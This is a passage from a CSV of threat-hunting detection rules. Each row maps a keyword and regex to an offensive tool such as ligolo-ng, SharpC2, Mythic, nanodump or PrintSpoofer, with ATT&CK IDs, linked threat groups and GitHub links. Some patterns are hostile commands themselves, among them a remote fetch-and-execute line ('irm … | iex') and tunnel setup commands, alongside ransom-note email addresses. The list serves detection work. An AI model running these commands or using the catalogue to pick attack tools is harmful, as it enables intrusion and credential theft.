T1046 - T1016","TA0007","N/A","KNOTWEED","Discovery","https://github.com/S3cur3Th1sSh1t/SharpOxidResolver","1","1","N/A","N/A","9","1","50","9","2020-11-25T08:42:06Z","2020-11-25T08:23:23Z","49901" "*ip link set ligolo up*",".{0,1000}ip\slink\sset\sligolo\sup.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","49903" "*ip link set ligolo up*",".{0,1000}ip\slink\sset\sligolo\sup.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","0","#linux","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","49904" "*ip link set ligolo up*",".{0,1000}ip\slink\sset\sligolo\sup.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#linux","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","49905" "*ip route add * dev ligolo*",".{0,1000}ip\sroute\sadd\s.{0,1000}\sdev\sligolo.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","49906" "*ip route add * dev ligolo*",".{0,1000}ip\sroute\sadd\s.{0,1000}\sdev\sligolo.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#linux","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","49907" "*ip tuntap add user * mode tun ligolo*",".{0,1000}ip\stuntap\sadd\suser\s.{0,1000}\smode\stun\sligolo.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#linux","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","49908" "*ip tuntap add user root mode tun ligolo*",".{0,1000}ip\stuntap\sadd\suser\sroot\smode\stun\sligolo.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","49909" "*IPeerToPeerService.*",".{0,1000}IPeerToPeerService\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","49911" "*IPfuscation.sln*",".{0,1000}IPfuscation\.sln.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders 
(base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","49912" "*IPfuscation.vcxproj*",".{0,1000}IPfuscation\.vcxproj.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","49913" "*IPPrintC2.ps1*",".{0,1000}IPPrintC2\.ps1.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","1","N/A","N/A","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","49914" "*IPPrintC2-main.zip*",".{0,1000}IPPrintC2\-main\.zip.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","49915" "*ipSlav/DirtyCLR*",".{0,1000}ipSlav\/DirtyCLR.{0,1000}","offensive_tool_keyword","DirtyCLR","An App Domain Manager Injection DLL PoC","T1055.001 - T1546.016 - T1055.013","TA0005 - TA0004","N/A","Black Basta","Privilege 
Escalation","https://github.com/ipSlav/DirtyCLR","1","1","N/A","N/A","7","2","170","19","2023-12-14T21:22:12Z","2023-12-11T11:29:36Z","49922" "*iptables -%c OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP *",".{0,1000}iptables\s\-\%c\sOUTPUT\s\-p\stcp\s\-d\s127\.0\.0\.1\s\-\-tcp\-flags\sRST\sRST\s\-j\sDROP\s.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","49924" "*iptables -t nat -A REDSOCKS*",".{0,1000}iptables\s\-t\snat\s\-A\sREDSOCKS.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","N/A","9","3","287","30","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z","49929" "*IQoJb3Jpz2cXpQRkpVX3Uf*",".{0,1000}IQoJb3Jpz2cXpQRkpVX3Uf.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","N/A","8","2","101","3","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z","49930" "*irc.pico.sh*",".{0,1000}irc\.pico\.sh.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","49931" "*IReversePortForwardService.*",".{0,1000}IReversePortForwardService\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","49932" "*irkjanm/krbrelayx*",".{0,1000}irkjanm\/krbrelayx.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","49933" "*irm unit259.fyi/dbgui | iex*",".{0,1000}irm\sunit259\.fyi\/dbgui\s\|\siex.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","49934" "*irs.exe -*",".{0,1000}irs\.exe\s\-.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","N/A","1","95","12","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z","49935" "*irs.exe 
exec*",".{0,1000}irs\.exe\sexec.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","N/A","1","95","12","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z","49936" "*irs.exe list*",".{0,1000}irs\.exe\slist.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","N/A","1","95","12","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z","49937" "*irs.exe list*",".{0,1000}irs\.exe\slist.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","N/A","1","95","12","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z","49938" "*irsl/curlshell*",".{0,1000}irsl\/curlshell.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","#linux","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","49939" "*is needed to run the DefenderRemover 
*",".{0,1000}is\sneeded\sto\srun\sthe\sDefenderRemover\s.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#content","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","49940" "*is_binary_in_gtfobins(*",".{0,1000}is_binary_in_gtfobins\(.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","49941" "*is_kirbi_file*",".{0,1000}is_kirbi_file.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","49942" "*is_proxy_stub_dll_loaded*",".{0,1000}is_proxy_stub_dll_loaded.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","49943" "*iscsicpl autoelevate DLL Search Order hijacking UAC Bypass*",".{0,1000}iscsicpl\sautoelevate\sDLL\sSearch\sOrder\shijacking\sUAC\sBypass.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for x64 Windows 7 - 11","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","1","0","#content","N/A","9","9","802","156","2022-07-27T15:48:45Z","2022-07-14T02:37:50Z","49944" "*iscsicpl_BypassUAC_x86.exe*",".{0,1000}iscsicpl_BypassUAC_x86\.exe.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for x64 Windows 7 - 11","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense 
Evasion","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","1","1","N/A","N/A","9","9","802","156","2022-07-27T15:48:45Z","2022-07-14T02:37:50Z","49945" "*ISecurityEditorUAC_off.exe*",".{0,1000}ISecurityEditorUAC_off\.exe.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for x64 Windows 7 - 11","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","1","1","N/A","N/A","9","9","802","156","2022-07-27T15:48:45Z","2022-07-14T02:37:50Z","49946" "*isShellcodeThread*",".{0,1000}isShellcodeThread.{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","N/A","10","10","1012","160","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z","49947" "*issue_shell_whoami*",".{0,1000}issue_shell_whoami.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - 
T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","49948" "*it will extract domain controller private key through RPC uses it to decrypt all credentials*",".{0,1000}it\swill\sextract\sdomain\scontroller\sprivate\skey\sthrough\sRPC\suses\sit\sto\sdecrypt\sall\scredentials.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","N/A","10","6","510","59","2024-07-31T19:05:30Z","2022-09-09T15:07:15Z","49949" "*It2H@Qp3Xe*sxdc#KA8)dbMtI5Q7&FK*",".{0,1000}It2H\@Qp3Xe.{0,1000}sxdc\#KA8\)dbMtI5Q7\&FK.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","49950" "*Itay Migdal*",".{0,1000}Itay\sMigdal.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","49952" "*itaymigdal/LOLSpoof*",".{0,1000}itaymigdal\/LOLSpoof.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","1","N/A","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","49953" "*itaymigdal/Poshito*",".{0,1000}itaymigdal\/Poshito.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","1","N/A","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","49954" "*it-gorillaz/lnk2pwn*",".{0,1000}it\-gorillaz\/lnk2pwn.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","1","N/A","N/A","8","2","193","34","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z","49955" 
"*ithelp07@decorous.cyou*",".{0,1000}ithelp07\@decorous\.cyou.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","49956" "*ithelp07@wholeness.business*",".{0,1000}ithelp07\@wholeness\.business.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","49957" "*itm4n/Perfusion*",".{0,1000}itm4n\/Perfusion.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","49958" "*itm4n/PPLmedic*",".{0,1000}itm4n\/PPLmedic.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","1","N/A","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","49959" "*itm4n/PrintSpoofer*",".{0,1000}itm4n\/PrintSpoofer.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","49960" 
"*itm4n/PrintSpoofer*",".{0,1000}itm4n\/PrintSpoofer.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","49961" "*itm4n/PrivescCheck*",".{0,1000}itm4n\/PrivescCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49962" "*itm4nprivesc*",".{0,1000}itm4nprivesc.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49963" "*its-a-feature/Apfell*",".{0,1000}its\-a\-feature\/Apfell.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","49964" "*its-a-feature/Mythic*",".{0,1000}its\-a\-feature\/Mythic.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black 
Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","49965" "*its-a-feature/Mythic*",".{0,1000}its\-a\-feature\/Mythic.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","49966" "*ItsNee/Follina-CVE-2022-30190-POC*",".{0,1000}ItsNee\/Follina\-CVE\-2022\-30190\-POC.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z","49967" "*itunes_backup2john.pl*",".{0,1000}itunes_backup2john\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","49968" "*itwasalladream -u * -p * -d *",".{0,1000}itwasalladream\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-d\s.{0,1000}","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. 
Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","0","N/A","N/A","7","8","796","123","2024-05-19T16:25:52Z","2021-07-05T20:13:49Z","49969" "*itwasalladream*bogus.dll*",".{0,1000}itwasalladream.{0,1000}bogus\.dll.{0,1000}","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","0","N/A","N/A","7","8","796","123","2024-05-19T16:25:52Z","2021-07-05T20:13:49Z","49970" "*ItWasAllADream-master*",".{0,1000}ItWasAllADream\-master.{0,1000}","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","1","N/A","N/A","7","8","796","123","2024-05-19T16:25:52Z","2021-07-05T20:13:49Z","49971" "*IUnknownObj.cpp*",".{0,1000}IUnknownObj\.cpp.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","49972" "*IvanGlinkin/AutoSUID*",".{0,1000}IvanGlinkin\/AutoSUID.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","1","N/A","N/A","7","4","375","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z","49973" "*ivan-sincek/php-reverse-shell*",".{0,1000}ivan\-sincek\/php\-reverse\-shell.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","49974" "*ivre-masscan/*",".{0,1000}ivre\-masscan\/.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. 
